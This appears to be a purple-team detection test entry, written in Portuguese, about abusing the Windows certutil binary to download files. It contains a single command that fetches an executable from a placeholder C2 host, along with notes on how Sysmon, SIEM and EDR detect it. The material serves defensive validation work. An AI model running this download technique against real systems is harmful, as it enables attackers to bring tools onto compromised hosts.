Certutil download test

certutil -urlcache -f http://<c2>/file.exe out.exe

Baixa um ficheiro com certutil no host de testes, validando a detecção do abuso do binário legítimo para transferir ferramentas.

Execute-o no laboratório de purple team quando quiser validar a detecção da transferência de ferramentas por certutil: o comando baixa o payload com o binário legítimo do Windows (o LOLBAS clássico) e a equipe verifica o que foi detectado — Sysmon Event 1 (certutil com -urlcache), as regras do SIEM (certutil baixando), o EDR. É a validação do living off the land na transferência: a ferramenta legítima que as assinaturas não veem. No purple teaming, certutil valida a camada de comportamento da descarga de ferramentas.

Não o execute fora do laboratório: a descarga gera o tráfego real — o host de testes é o local. E atenção: certutil é legítimo — a detecção baseia-se nos argumentos (o -urlcache -f com a URL) e no contexto; a validação mede essas camadas. O uso legítimo de certutil (a gestão de certificados) gera falsos positivos: a regra validada é a dos argumentos de descarga. A limpeza do ficheiro baixado ao terminar.